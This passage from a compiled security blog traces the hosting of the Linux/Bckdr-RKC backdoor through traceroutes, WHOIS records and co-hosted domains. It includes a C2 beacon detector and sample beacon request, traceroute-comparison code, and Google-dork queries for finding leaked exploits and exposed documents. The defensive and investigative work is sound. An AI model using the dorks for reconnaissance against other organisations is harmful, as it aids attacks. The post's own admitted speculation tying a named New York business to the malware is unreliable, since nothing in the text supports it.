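    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\n"
    "Host: 216.83.44.229: 99\r\n"
    "Connection: Close\r\n"
    "\r\n"
)

# Constructed: an ordinary package-manager request from the same kind of host
SAMPLE_BENIGN = (
    "GET /debian/dists/squeeze/Release HTTP/1.1\r\n"
    "Host: ftp.debian.org\r\n"
    "User-Agent: Debian APT-HTTP/1.3 (0.8.10.3)\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("beacon", SAMPLE_BEACON), ("benign", SAMPLE_BENIGN)):
        print(label, rkc_beacon_score(req), is_rkc_beacon(req))
```

The host check is deliberately kept separate from the UA and locale checks: the hosting can move (the next post shows the netblock going dark), while the hard-coded headers survive until the binary is rebuilt, so a partial score on UA plus locale alone is still worth a look in proxy logs.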

1.4.20

Following the Trail: Determining the Origins of Linux/Bckdr-RKC (2011-12-31 12:10)

It is already known that the two Linux/Bckdr-RKC variants I have received have both been hosted by 216.83.44.229. Furthermore, the first variant had a phone-home address of 216.83.44.226. Both of these IP addresses are registered to the netblock owned by WIRELESS-ALARM.COM (not to be confused with the actual website wireless-alarm.com, which is registered to a different contact completely, and unrelated here). Let's use what we already know to try to find the organization responsible for this malware. Here is a traceroute I performed several days ago:

Hop (ms) (ms) (ms) IP Address Host name
1 0 0 0 206.123.64.154 [1]jbdr2.0.dal.colo4.com
2 0 0 0 64.124.196.225 [2]xe-4-2-0.er2.dfw2.us.above.net
3 0 Timed out 0 63.218.23.29 [3]ge5-4.br02.dal01.pccwbtn.net
4 214 214 214 63.218.252.86 [4]ge9-39.br03.hkg04.pccwbtn.net
5 214 214 258 112.121.160.221 -
6 213 213 213 112.121.160.18 -
7 218 218 217 112.121.160.198 -
8 213 213 212 216.83.44.226

And here is a traceroute as performed today:

TraceRoute to 216.83.44.226
Hop (ms) (ms) (ms) IP Address Host name
1 12 0 0 206.123.64.154 jbdr2.0.dal.colo4.com
2 0 0 0 64.124.196.225 xe-4-2-0.er2.dfw2.us.above.net
3 0 0 0 63.218.23.29 ge5-4.br02.dal01.pccwbtn.net
4 212 212 212 63.218.252.86 ge9-39.br03.hkg04.pccwbtn.net
5 Timed out Timed out Timed out -
6 Timed out Timed out Timed out -
7 Timed out Timed out Timed out -
8 Timed out Timed out Timed out

Seems that either the responsible organization has been disconnected from the network by their provider, or they have purposely disconnected themselves to hinder analysis. Starting with 216.83.44.226 and working backwards, let's see who this section of IP addresses is registered to. 216.83.44.0 - 216.83.44.255 is registered to WIRELESS-ALARM.COM:

OrgName: WIRELESS-ALARM.COM
OrgId: WIREL-46
Address: 3026 Ensley 5 Points W Avenue
City: Birmingham
StateProv: AL
PostalCode: 35208
Country: US
RegDate: 2009-12-30
Updated: 2011-09-24
Ref: http://whois.arin.net/rest/org/WIREL-46
OrgAbuseHandle: PQU12-ARIN
OrgAbuseName: Quagliano, Pedro
OrgAbusePhone: +1-877-605-5273
OrgAbuseEmail: pedroquagliano@cyanclouds.com

We already know that this is a fake registration, because all of my emails to pedroquagliano@cyanclouds.com were returned as non-deliverable due to DNS failures. That means cyanclouds.com is not an active domain. Let's go up a level in IP address ownership. 216.83.32.0 - 216.83.63.255 is owned by Ether.Net LLC.

network:Class-Name:network
network:ID:216.83.32.0/20
network:Auth-Area:216.83.32.0/20
network:Network-Name:ETHRN-216-83-46-0
network:IP-Network:216.83.46.0/24
network:IP-Network-Block:216.83.46.0 - 216.83.46.255
network:Org-Name:InfoMove Hong Kong Limited.
network:Street-Address:Unit 2001, 20/F, New Tech Plaza, 8 Tai Yau Street
network:City:San Po Kong
network:State:HK
network:Country-Code:HK

Ether.NET appears to be a legitimate business operating in Hong Kong. They have been around for many years. They have an AIM for support which I was able to trace back to 2003 posting on web hosting support forums. Doubtful that they're involved, so let's shift our focus elsewhere.
Going back to the IP range owned by WIRELESS-ALARM.COM, 216.83.44.0 - 216.83.44.255, let's look at what else is hosted there. From [5]http://bgp.he.net/net/216.83.44.0/24

# dns as of 12/31/2011 6:21 PST
IP / PTR / A
[6]216.83.44.31 [7]mail.bostonyarn.com
[8]216.83.44.54 [9]fold.bronxbreakfast.com
[10]216.83.44.113 [11]prn.iselinnotebook.com
[12]216.83.44.115 [13]joplinyear.com
[14]216.83.44.116 [15]mail.joplinyear.com
[16]216.83.44.189 [17]proe.northandoverschool.com
[18]216.83.44.191 [19]northbendlearning.com
[20]216.83.44.202 [21]wink.norwellobservation.com
[22]216.83.44.204 [23]mail.philadelphiafather.com, [24]e8lvbet.com, [25]i3mic.com
[26]216.83.44.221 [27]copy.southplainfieldfeet.com
[28]216.83.44.2 [29]ns1.cyanclouds.com
[30]216.83.44.3 [31]ns2.cyanclouds.com
[32]216.83.44.10 [33]22073.com
[34]216.83.44.18 [35]int-pe.com, [36]interush-pe.com
[37]216.83.44.19 [38]oll365.com
[39]216.83.44.42 [40]centrinofund.com, [41]cf-pe.com
[42]216.83.44.44 [43]games456.us, [44]gamt465.com, [45]gmae456.info
[46]216.83.44.45 [47]com-com-com-com-com.com
[48]216.83.44.46 [49]111i.net, [50]23u9.com, [51]55-com.com, [52]gamex6.com, [53]llgame.net, [54]org2.net
[55]216.83.44.66 [56]bmp79.com
[57]216.83.44.67 [58]app67.com, [59]apt67.com, [60]bbv78.com, [61]bul79.com, [62]ddc77.com, [63]ght33.com, [64]jjt55.com, [65]jpg77.com, [66]kky55.com, [67]mmx88.com, [68]rtr66.com, [69]sta78.com, [70]tgg33.com, [71]uub33.com, [72]vbo33.com, [73]vvx45.com
[74]216.83.44.68 [75]aaz33.com, [76]ccx89.com, [77]ygk77.com
[78]216.83.44.69 [79]abo34.com, [80]bmn99.com, [81]ccx66.com, [82]ese55.com, [83]ffs234.com, [84]jsa52.com, [85]kbx33.com, [86]kut99.com, [87]kyy78.com, [88]myb78.com, [89]nnc99.com, [90]rka77.com, [91]ssx69.com, [92]ttx77.com, [93]tvn66.com, [94]wsd22.com
[95]216.83.44.70 [96]kgb69.com
[97]216.83.44.82 [98]66hw.net, [99]hk888.net
[100]216.83.44.90 [101]clubwptasia.com, [102]haedongcheong.com, [103]oce365.com, [104]openrace24.com
[105]216.83.44.99 [106]ylg886.com
[107]216.83.44.122 [108]hg1138.com
[109]216.83.44.123 [110]fh636.com, [111]hg3968.com, [112]hk638.com, [113]yh372.com
[114]216.83.44.131 [115]hg0608.com, [116]hg1918.com, [117]hg4568.com, [118]hg9168.com, [119]hg9338.com
[120]216.83.44.132 [121]hg7678.com
[122]216.83.44.154 [123]sc93.com
[124]216.83.44.155 [125]tv105.com
[126]216.83.44.156 [127]duooo.com
[128]216.83.44.157 [129]bbsveb.com
[130]216.83.44.163 [131]1999829.com, [132]3771mm.info, [133]911meinv.info, [134]mytaojia.com, [135]qgxinxi.info, [136]taaobbao.com, [137]wawachina.info, [138]yayaqq.info
[139]216.83.44.164 [140]360meinv.info, [141]920meinv.com, [142]999taobao.com, [143]kissbye.info, [144]tabaserver.com
[145]216.83.44.165 [146]265gc.com
[147]216.83.44.166 [148]439995.com
[149]216.83.44.186 [150]03hz.com, [151]18018.com
[152]216.83.44.194 [153]ckk67.com, [154]fta79.com, [155]jkj88.com, [156]ktm77.com, [157]ktm99.com, [158]mou79.com, [159]nvb89.com, [160]pub79.com, [161]ssr999.com, [162]ssx778.com, [163]tot66.com, [164]tut88.com, [165]utp79.com, [166]vub99.com, [167]xxr44.com, [168]yyc33.com
[169]216.83.44.195 [170]aki77.com, [171]amu77.com, [172]arp77.com, [173]arv99.com, [174]avc77.com, [175]eed69.com, [176]gje88.com, [177]mmb77.com, [178]mpo77.com, [179]tup77.com, [180]vcd79.com
[181]216.83.44.197 [182]vvz69.com
[183]216.83.44.218 [184]hg0035.com, [185]hg1090.com
[186]216.83.44.219 [187]hg1095.com, [188]hg8869.com
[189]216.83.44.228 [190]lcddos.com
[191]216.83.44.229 [192]todayg.com, [193]xy100000.com
[194]216.83.44.243 [195]hg0091.com, [196]hg0093.com, [197]hg0094.com
[198]216.83.44.245
[199]hg0092.com
[200]216.83.44.250 [201]tt95588.com

Hmm, remember the registration for WIRELESS-ALARM.COM? The email address pointed at cyanclouds.com... and the DNS servers for cyanclouds.com happen to be hosted in the same netblock. Could it be cyanclouds.com is also being controlled by the responsible organization? So let's look up the contact info for cyanclouds.com...

Domain Name: CYANCLOUDS.COM
Registrar: DIRECTNIC, LTD
Whois Server: whois.directnic.com
Referral URL: http://www.directnic.com
Name Server: NS1.CYANCLOUDS.COM
Name Server: NS2.CYANCLOUDS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 31-jan-2011
Creation Date: 03-mar-2009
Expiration Date: 03-mar-2012

Registrant:
Good Names Network
342 Broadway
New York, NY 10013
US
212-555-1212

Domain Name: CYANCLOUDS.COM

Administrative Contact:
Operations, Network goodnames@yahoo.com
342 Broadway
New York, NY 10013
US
212-555-1212

Technical Contact:
Operations, Network goodnames@yahoo.com
342 Broadway
New York, NY 10013
US
212-555-1212

It looks like cyanclouds.com is registered by proxy through another company called the Good Names Network. But wait... is this company real either? 212-555-1212 will simply give you [202]directory assistance for the 212 area code (New York). 342 Broadway is actually a [203]UPS Store which offers mailbox services... so this could be anyone. So, another dead end? This malware which has definite Chinese origins also has a link to an anonymous business in New York. This is where I'd like to point out the marvels of Google. Specifically Google Street View. Without Google Street View, we would never have known that next to this UPS Store at 344 Broadway is a shop called Broadway Cleaners. A quick Google search shows that Broadway Cleaners is actually owned by someone at [204]95 Worth Street, which happens to be in [205]Chinatown.

Please note that this is absolutely speculation, and that there is no proof whatsoever anyone at Broadway Cleaners has anything to do with this. However, the fact that the malware has definite ties to China, and the fact that the proxy company used to register WIRELESS-ALARM.COM's IP block is right next door to a business originating in Chinatown, is a very interesting coincidence. Unfortunately this is where the trail goes cold. This search for the origin of this malware has possibly raised more questions than provided answers. But one thing is for certain - the network framework for this malware has definitely been in place for some time. WIRELESS-ALARM.COM's IP block as well as cyanclouds.com have been registered since 2009. This is not the work of a fly-by-night script kiddy. Careful planning has been taken to not only develop this malware, but also to establish the hosting this malware would be using - and hide its true origins.
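The two traceroutes in this post are compared by eye; the same comparison can be scripted so that a C2 address can be re-checked daily and the hop where the path goes dark is recorded. This is an added example, not the blog author's tooling. The two hop tables are the ones quoted above, retyped as plain text (the hop 4 hostname is written as in reference [4]); the parser accepts "Timed out" probes and hops with no reverse DNS ("-").

```python
"""Compare two traceroute runs to the C2 address, as done by hand in the post above.

Added example (not the blog author's tooling). TRACE_BEFORE and TRACE_AFTER are
the two hop tables quoted in the post, retyped as plain text.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


@dataclass
class Hop:
    number: int
    rtts: List[Optional[int]] = field(default_factory=list)  # None = probe timed out
    ip: Optional[str] = None
    host: Optional[str] = None

    @property
    def responded(self):
        return self.ip is not None


def parse_traceroute(text):
    """Parse lines of the form "<hop> <rtt|Timed out> x3 [ip] [hostname|-]"."""
    hops = []
    for line in text.strip().splitlines():
        tokens = line.split()
        if not tokens or not tokens[0].isdigit():
            continue                      # skip the column header line
        hop = Hop(number=int(tokens[0]))
        i = 1
        while len(hop.rtts) < 3 and i < len(tokens):
            if tokens[i] == "Timed" and i + 1 < len(tokens) and tokens[i + 1] == "out":
                hop.rtts.append(None)
                i += 2
            else:
                hop.rtts.append(int(tokens[i]))
                i += 1
        if i < len(tokens) and IPV4.match(tokens[i]):
            hop.ip = tokens[i]
            i += 1
        if i < len(tokens) and tokens[i] != "-":
            hop.host = tokens[i]
        hops.append(hop)
    return hops


def last_responding_hop(hops):
    """Highest hop number that answered with an address, or 0 if none did."""
    answered = [h.number for h in hops if h.responded]
    return max(answered) if answered else 0


def path_divergence(before, after):
    """First hop number where the two runs disagree on the responding address."""
    for a, b in zip(before, after):
        if a.ip != b.ip:
            return a.number
    return None


TRACE_BEFORE = """
Hop (ms) (ms) (ms) IP Address Host name
1 0 0 0 206.123.64.154 jbdr2.0.dal.colo4.com
2 0 0 0 64.124.196.225 xe-4-2-0.er2.dfw2.us.above.net
3 0 Timed out 0 63.218.23.29 ge5-4.br02.dal01.pccwbtn.net
4 214 214 214 63.218.252.86 ge9-39.br03.hkg04.pccwbtn.net
5 214 214 258 112.121.160.221 -
6 213 213 213 112.121.160.18 -
7 218 218 217 112.121.160.198 -
8 213 213 212 216.83.44.226
"""

TRACE_AFTER = """
Hop (ms) (ms) (ms) IP Address Host name
1 12 0 0 206.123.64.154 jbdr2.0.dal.colo4.com
2 0 0 0 64.124.196.225 xe-4-2-0.er2.dfw2.us.above.net
3 0 0 0 63.218.23.29 ge5-4.br02.dal01.pccwbtn.net
4 212 212 212 63.218.252.86 ge9-39.br03.hkg04.pccwbtn.net
5 Timed out Timed out Timed out -
6 Timed out Timed out Timed out -
7 Timed out Timed out Timed out -
8 Timed out Timed out Timed out
"""


def summarize(before_text, after_text):
    """Where each run stopped answering, and the first hop on which the runs differ."""
    before, after = parse_traceroute(before_text), parse_traceroute(after_text)
    return {
        "last_hop_before": last_responding_hop(before),
        "last_hop_after": last_responding_hop(after),
        "diverges_at": path_divergence(before, after),
        "last_ip_after": next((h.ip for h in reversed(after) if h.responded), None),
    }


if __name__ == "__main__":
    print(summarize(TRACE_BEFORE, TRACE_AFTER))
```

The result for the two runs above is that the path still reaches the PCCW router in Hong Kong at hop 4 and goes dark at hop 5, the first 112.121.160.x hop, which is consistent with the post's reading that the cut happened downstream of the transit provider rather than anywhere in the local network.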
1. http://jbdr2.0.dal.colo4.com/
2. http://xe-4-2-0.er2.dfw2.us.above.net/
3. http://ge5-4.br02.dal01.pccwbtn.net/
4. http://ge9-39.br03.hkg04.pccwbtn.net/
5. http://bgp.he.net/net/216.83.44.0/24#_dns
6. http://bgp.he.net/ip/216.83.44.31
7. http://bgp.he.net/dns/mail.bostonyarn.com
8. http://bgp.he.net/ip/216.83.44.54
9. http://bgp.he.net/dns/fold.bronxbreakfast.com
10. http://bgp.he.net/ip/216.83.44.113
11. http://bgp.he.net/dns/prn.iselinnotebook.com
12. http://bgp.he.net/ip/216.83.44.115
13. http://bgp.he.net/dns/joplinyear.com
14. http://bgp.he.net/ip/216.83.44.116
15. http://bgp.he.net/dns/mail.joplinyear.com
16. http://bgp.he.net/ip/216.83.44.189
17. http://bgp.he.net/dns/proe.northandoverschool.com
18. http://bgp.he.net/ip/216.83.44.191
19. http://bgp.he.net/dns/northbendlearning.com
20. http://bgp.he.net/ip/216.83.44.202
21. http://bgp.he.net/dns/wink.norwellobservation.com
22. http://bgp.he.net/ip/216.83.44.204
23. http://bgp.he.net/dns/mail.philadelphiafather.com
24. http://bgp.he.net/dns/e8lvbet.com
25. http://bgp.he.net/dns/i3mic.com
26. http://bgp.he.net/ip/216.83.44.221
27. http://bgp.he.net/dns/copy.southplainfieldfeet.com
28. http://bgp.he.net/ip/216.83.44.2
29. http://bgp.he.net/dns/ns1.cyanclouds.com
30. http://bgp.he.net/ip/216.83.44.3
31. http://bgp.he.net/dns/ns2.cyanclouds.com
32. http://bgp.he.net/ip/216.83.44.10
33. http://bgp.he.net/dns/22073.com
34. http://bgp.he.net/ip/216.83.44.18
35. http://bgp.he.net/dns/int-pe.com
36. http://bgp.he.net/dns/interush-pe.com
37. http://bgp.he.net/ip/216.83.44.19
38. http://bgp.he.net/dns/oll365.com
39. http://bgp.he.net/ip/216.83.44.42
40. http://bgp.he.net/dns/centrinofund.com
41. http://bgp.he.net/dns/cf-pe.com
42. http://bgp.he.net/ip/216.83.44.44
43. http://bgp.he.net/dns/games456.us
44. http://bgp.he.net/dns/gamt465.com
45. http://bgp.he.net/dns/gmae456.info
46. http://bgp.he.net/ip/216.83.44.45
47. http://bgp.he.net/dns/com-com-com-com-com.com
48. http://bgp.he.net/ip/216.83.44.46
49. http://bgp.he.net/dns/111i.net
50. http://bgp.he.net/dns/23u9.com
51. http://bgp.he.net/dns/55-com.com
52. http://bgp.he.net/dns/gamex6.com
53. http://bgp.he.net/dns/llgame.net
54. http://bgp.he.net/dns/org2.net
55. http://bgp.he.net/ip/216.83.44.66
56. http://bgp.he.net/dns/bmp79.com
57. http://bgp.he.net/ip/216.83.44.67
58. http://bgp.he.net/dns/app67.com
59. http://bgp.he.net/dns/apt67.com
60. http://bgp.he.net/dns/bbv78.com
61. http://bgp.he.net/dns/bul79.com
62. http://bgp.he.net/dns/ddc77.com
63. http://bgp.he.net/dns/ght33.com
64. http://bgp.he.net/dns/jjt55.com
65. http://bgp.he.net/dns/jpg77.com
66. http://bgp.he.net/dns/kky55.com
67. http://bgp.he.net/dns/mmx88.com
68. http://bgp.he.net/dns/rtr66.com
69. http://bgp.he.net/dns/sta78.com
70. http://bgp.he.net/dns/tgg33.com
71. http://bgp.he.net/dns/uub33.com
72. http://bgp.he.net/dns/vbo33.com
73. http://bgp.he.net/dns/vvx45.com
74. http://bgp.he.net/ip/216.83.44.68
75. http://bgp.he.net/dns/aaz33.com
76. http://bgp.he.net/dns/ccx89.com
77. http://bgp.he.net/dns/ygk77.com
78. http://bgp.he.net/ip/216.83.44.69
79. http://bgp.he.net/dns/abo34.com
80. http://bgp.he.net/dns/bmn99.com
81. http://bgp.he.net/dns/ccx66.com
82. http://bgp.he.net/dns/ese55.com
83. http://bgp.he.net/dns/ffs234.com
84. http://bgp.he.net/dns/jsa52.com
85. http://bgp.he.net/dns/kbx33.com
86. http://bgp.he.net/dns/kut99.com
87. http://bgp.he.net/dns/kyy78.com
88. http://bgp.he.net/dns/myb78.com
89. http://bgp.he.net/dns/nnc99.com
90. http://bgp.he.net/dns/rka77.com
91. http://bgp.he.net/dns/ssx69.com
92. http://bgp.he.net/dns/ttx77.com
93. http://bgp.he.net/dns/tvn66.com
94. http://bgp.he.net/dns/wsd22.com
95. http://bgp.he.net/ip/216.83.44.70
96. http://bgp.he.net/dns/kgb69.com
97. http://bgp.he.net/ip/216.83.44.82
98. http://bgp.he.net/dns/66hw.net
99. http://bgp.he.net/dns/hk888.net
100. http://bgp.he.net/ip/216.83.44.90
101. http://bgp.he.net/dns/clubwptasia.com
102. http://bgp.he.net/dns/haedongcheong.com
103. http://bgp.he.net/dns/oce365.com
104. http://bgp.he.net/dns/openrace24.com
105. http://bgp.he.net/ip/216.83.44.99
106. http://bgp.he.net/dns/ylg886.com
107. http://bgp.he.net/ip/216.83.44.122
108. http://bgp.he.net/dns/hg1138.com
109. http://bgp.he.net/ip/216.83.44.123
110. http://bgp.he.net/dns/fh636.com
111. http://bgp.he.net/dns/hg3968.com
112. http://bgp.he.net/dns/hk638.com
113. http://bgp.he.net/dns/yh372.com
114. http://bgp.he.net/ip/216.83.44.131
115. http://bgp.he.net/dns/hg0608.com
116. http://bgp.he.net/dns/hg1918.com
117. http://bgp.he.net/dns/hg4568.com
118. http://bgp.he.net/dns/hg9168.com
119. http://bgp.he.net/dns/hg9338.com
120. http://bgp.he.net/ip/216.83.44.132
121. http://bgp.he.net/dns/hg7678.com
122. http://bgp.he.net/ip/216.83.44.154
123. http://bgp.he.net/dns/sc93.com
124. http://bgp.he.net/ip/216.83.44.155
125. http://bgp.he.net/dns/tv105.com
126. http://bgp.he.net/ip/216.83.44.156
127. http://bgp.he.net/dns/duooo.com
128. http://bgp.he.net/ip/216.83.44.157
129. http://bgp.he.net/dns/bbsveb.com
130. http://bgp.he.net/ip/216.83.44.163
131. http://bgp.he.net/dns/1999829.com
132. http://bgp.he.net/dns/3771mm.info
133. http://bgp.he.net/dns/911meinv.info
134. http://bgp.he.net/dns/mytaojia.com
135. http://bgp.he.net/dns/qgxinxi.info
136. http://bgp.he.net/dns/taaobbao.com
137. http://bgp.he.net/dns/wawachina.info
138. http://bgp.he.net/dns/yayaqq.info
139. http://bgp.he.net/ip/216.83.44.164
140. http://bgp.he.net/dns/360meinv.info
141. http://bgp.he.net/dns/920meinv.com
142. http://bgp.he.net/dns/999taobao.com
143. http://bgp.he.net/dns/kissbye.info
144. http://bgp.he.net/dns/tabaserver.com
145. http://bgp.he.net/ip/216.83.44.165
146. http://bgp.he.net/dns/265gc.com
147. http://bgp.he.net/ip/216.83.44.166
148. http://bgp.he.net/dns/439995.com
149. http://bgp.he.net/ip/216.83.44.186
150. http://bgp.he.net/dns/03hz.com
151. http://bgp.he.net/dns/18018.com
152. http://bgp.he.net/ip/216.83.44.194
153. http://bgp.he.net/dns/ckk67.com
154. http://bgp.he.net/dns/fta79.com
155. http://bgp.he.net/dns/jkj88.com
156. http://bgp.he.net/dns/ktm77.com
157. http://bgp.he.net/dns/ktm99.com
158. http://bgp.he.net/dns/mou79.com
159. http://bgp.he.net/dns/nvb89.com
160. http://bgp.he.net/dns/pub79.com
161. http://bgp.he.net/dns/ssr999.com
162. http://bgp.he.net/dns/ssx778.com
163. http://bgp.he.net/dns/tot66.com
164. http://bgp.he.net/dns/tut88.com
165. http://bgp.he.net/dns/utp79.com
166. http://bgp.he.net/dns/vub99.com
167. http://bgp.he.net/dns/xxr44.com
168. http://bgp.he.net/dns/yyc33.com
169. http://bgp.he.net/ip/216.83.44.195
170. http://bgp.he.net/dns/aki77.com
171. http://bgp.he.net/dns/amu77.com
172. http://bgp.he.net/dns/arp77.com
173. http://bgp.he.net/dns/arv99.com
174. http://bgp.he.net/dns/avc77.com
175. http://bgp.he.net/dns/eed69.com
176. http://bgp.he.net/dns/gje88.com
177. http://bgp.he.net/dns/mmb77.com
178. http://bgp.he.net/dns/mpo77.com
179. http://bgp.he.net/dns/tup77.com
180. http://bgp.he.net/dns/vcd79.com
181. http://bgp.he.net/ip/216.83.44.197
182. http://bgp.he.net/dns/vvz69.com
183. http://bgp.he.net/ip/216.83.44.218
184. http://bgp.he.net/dns/hg0035.com
185. http://bgp.he.net/dns/hg1090.com
186. http://bgp.he.net/ip/216.83.44.219
187. http://bgp.he.net/dns/hg1095.com
188. http://bgp.he.net/dns/hg8869.com
189. http://bgp.he.net/ip/216.83.44.228
190. http://bgp.he.net/dns/lcddos.com
191. http://bgp.he.net/ip/216.83.44.229
192. http://bgp.he.net/dns/todayg.com

1.4. December
193. http://bgp.he.net/dns/xy100000.com 194. http://bgp.he.net/ip/216.83.44.243 195. http://bgp.he.net/dns/hg0091.com 196. http://bgp.he.net/dns/hg0093.com 197. http://bgp.he.net/dns/hg0094.com 198. http://bgp.he.net/ip/216.83.44.245 199. http://bgp.he.net/dns/hg0092.com 200. http://bgp.he.net/ip/216.83.44.250 201. http://bgp.he.net/dns/tt95588.com 202. http://en.wikipedia.org/wiki/555_%28telephone_number%29#Real_uses_of_555_numbers 203. http://www.theupsstorelocal.com/5308/ 204. http://localdirectory.nydailynews.com/344+broadway+cleaners.9.7416489p.home.html 205. http://www.google.com/search?q=95+Worth+St+chinatown

BlogBook

c 2013 caeinesecurity.blogspot.com

59

BlogBook

1.4. December

60

c 2013 caeinesecurity.blogspot.com

Chapter 2

2012

2.1 January

2.1.1 Malware Analysis Lab - New Feature! (2012-01-04 18:26)

I'm happy to announce that I have created a Google Code project called the [1]Caffeine Security Malware Analysis Lab. At this project, you will be able to see my current research into unknown malware on my honeypot, and even contribute to my research! I have uploaded source code for xsyslog and ssyslog, which can be accessed through the source code SVN repository. [2]Check out the project now!
1. http://code.google.com/p/caffsec-malware-analysis/ 2. http://code.google.com/p/caffsec-malware-analysis/

2.1.2 Monitoring for New Zero Day Exploits through Google Alerts (2012-01-06 19:08)

In case you haven't read it, I previously posted a how-to for using Google Alerts to monitor for misuse of your personal information: [1]Misuse of Your Personal Information and Google Alerts. Today I'm going to expand on that post, and show how advanced Google search strings can be used to monitor for other things, such as when new zero day exploits are posted publicly to Pastebin. For those not familiar with it, Pastebin is a large site which allows anyone to post large amounts of text. One of the common uses for this site is the public disclosure of new vulnerabilities and exploits. To leverage some of the more powerful features of Google, use advanced search syntax to narrow your search. An excellent quick reference is available at [2]Google Guide. Using our previous method to create an "As it happens" alert, let's try writing a custom query which monitors for new exploits:

intext:exploit OR intext:vulnerability OR intext:zero day OR intext:0day site:pastebin.com

Further tweaking will allow you to target a specific software product or manufacturer, such as:

intext:microsoft intext:exploit OR intext:vulnerability OR intext:zero day OR intext:0day site:pastebin.com

I have provided an example RSS feed for a wide zero day search [3]here. Of course, this won't give you up-to-the-minute searching of Pastebin, but it's better than not monitoring at all.
1. http://caffeinesecurity.blogspot.com/2011/12/misuse-of-your-personal-information-and.html 2. http://www.googleguide.com/advanced_operators_reference.html 3. http://www.google.com/alerts/feeds/05108430098638908165/1562501272906263633

2.1.3 Monitoring for Leaked Company Documents through Google Alerts (2012-01-17 14:57)

This article is part of a series on using Google Alerts to protect you, your family, and your company through early notification of data breaches and leaks. Previous articles: [1]Misuse of Your Personal Information and Google Alerts, [2]Monitoring for New Zero Day Exploits through Google Alerts. If you're following good security practices, all of your internal company documents are properly labeled with important labels such as "Company Proprietary", "Company Sensitive" or "Do Not Distribute". In fact, your company has probably established a standardized header for use on all sensitive documents. So, when's the last time you performed a Google search for this header? When's the last time you searched to see what documents hosted on your domain are being exposed to the web? The results might surprise you. The [3]Google Hacking Database has some excellent information on how to use Google to find sensitive files. It's very easy to take some of the search queries there, add your company name or standard header, and see what happens. In fact, even if you find no results, it would be a great idea to set up Google Alerts to monitor for documents posted (accidentally or otherwise) which appear to be internal company documents. Here's an example, which should produce results for (hopefully!) intentionally posted documents:

site:blogspot.com filetype:doc OR filetype:xls OR filetype:pdf

The above query will return common office documents which are hosted on blogspot.com or any of its subdomains. Replace blogspot.com with your main domain, and see what results you find. Beware: many hackers already know these tricks, and will use them to perform reconnaissance on your company before initiating an attack. Even the most mundane documents, such as a list of email addresses and phone numbers, could be used to assist in launching a spear phishing (targeted phishing) attack against your company.
1. http://caffeinesecurity.blogspot.com/2011/12/misuse-of-your-personal-information-and.html 2. http://caffeinesecurity.blogspot.com/2012/01/monitoring-for-new-zero-day-exploits.html 3. http://www.hackersforcharity.org/ghdb/
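The two posts above hand-write their Google queries and point at the resulting alert feed. The following is an added example, not code from the blog: it builds the same intext:/filetype:/site: queries from term lists and parses the Atom feed a Google Alert publishes, so a scheduled poll can report only hits not seen before. It quotes multi-word terms such as "zero day", which Google would otherwise treat as separate words. The feed below is a constructed sample in the Google Alerts Atom layout; its entry ids and URLs are made up.

```python
"""Query building and alert-feed parsing for Google Alerts monitoring.
Added example, not code from the original blog: SAMPLE_FEED is a constructed
Atom document in the layout Google Alerts publishes (Atom 1.0 entries whose
links go through google.com/url?...&url=<target>)."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from datetime import datetime
from urllib.parse import parse_qs, urlparse

ATOM = "{http://www.w3.org/2005/Atom}"


def _term(operator, term):
    # Multi-word terms must be quoted, otherwise Google searches each word on its own.
    return f'{operator}:"{term}"' if " " in term else f"{operator}:{term}"


def build_query(any_of=(), site=None, all_of=(), filetypes=(), operator="intext"):
    """Assemble a query in the shape the posts use: required terms, then an
    OR-group of alternatives, then filetype alternatives, then the site filter."""
    parts = [_term(operator, t) for t in all_of]
    if any_of:
        parts.append(" OR ".join(_term(operator, t) for t in any_of))
    if filetypes:
        parts.append(" OR ".join(f"filetype:{ft}" for ft in filetypes))
    if site:
        parts.append(f"site:{site}")
    return " ".join(parts)


@dataclass(frozen=True)
class Alert:
    entry_id: str
    title: str
    url: str
    published: datetime


def _unwrap_google_redirect(href):
    """Alert links point at google.com/url?...&url=<target>; return the target."""
    parsed = urlparse(href)
    if parsed.netloc.endswith("google.com") and parsed.path == "/url":
        target = parse_qs(parsed.query).get("url")
        if target:
            return target[0]
    return href


def parse_alert_feed(xml_text):
    """Turn a Google Alerts Atom feed into Alert records."""
    root = ET.fromstring(xml_text)
    alerts = []
    for entry in root.findall(ATOM + "entry"):
        title_html = entry.findtext(ATOM + "title", default="")
        title = re.sub(r"<[^>]+>", "", title_html)  # drop <b> keyword highlighting
        link = entry.find(ATOM + "link")
        href = link.get("href", "") if link is not None else ""
        stamp = entry.findtext(ATOM + "published", default="1970-01-01T00:00:00Z")
        published = datetime.fromisoformat(stamp.replace("Z", "+00:00"))
        alerts.append(Alert(entry.findtext(ATOM + "id", default=""), title,
                            _unwrap_google_redirect(href), published))
    return alerts


def new_alerts(alerts, seen_ids):
    """Entries not processed yet; persist the returned ids between polls."""
    return [a for a in alerts if a.entry_id not in seen_ids]


# Constructed sample feed (two entries) in the Google Alerts Atom layout.
SAMPLE_FEED = """<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>Google Alert - intext:exploit site:pastebin.com</title>
  <entry>
    <id>tag:google.com,2005:reader/item/0001</id>
    <title type="html">New &lt;b&gt;exploit&lt;/b&gt; for ExampleApp</title>
    <link href="https://www.google.com/url?rct=j&amp;url=https://pastebin.com/example1&amp;ct=ga"/>
    <published>2012-01-06T19:08:00Z</published>
  </entry>
  <entry>
    <id>tag:google.com,2005:reader/item/0002</id>
    <title type="html">ExampleApp &lt;b&gt;vulnerability&lt;/b&gt; writeup</title>
    <link href="https://www.google.com/url?rct=j&amp;url=https://pastebin.com/example2&amp;ct=ga"/>
    <published>2012-01-07T08:15:00Z</published>
  </entry>
</feed>
"""

if __name__ == "__main__":
    print(build_query(["exploit", "vulnerability", "zero day", "0day"], site="pastebin.com"))
    print(build_query(site="example.com", filetypes=["doc", "xls", "pdf"]))
    already_seen = {"tag:google.com,2005:reader/item/0001"}
    for alert in new_alerts(parse_alert_feed(SAMPLE_FEED), already_seen):
        print(alert.published.isoformat(), alert.title, alert.url)
```

The seen-id set is what turns a feed into a monitor: store it on disk between runs and only the second entry above is reported on the next poll.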

2.1.4 SOPA Blackout Day January 18 (2012-01-18 00:40)

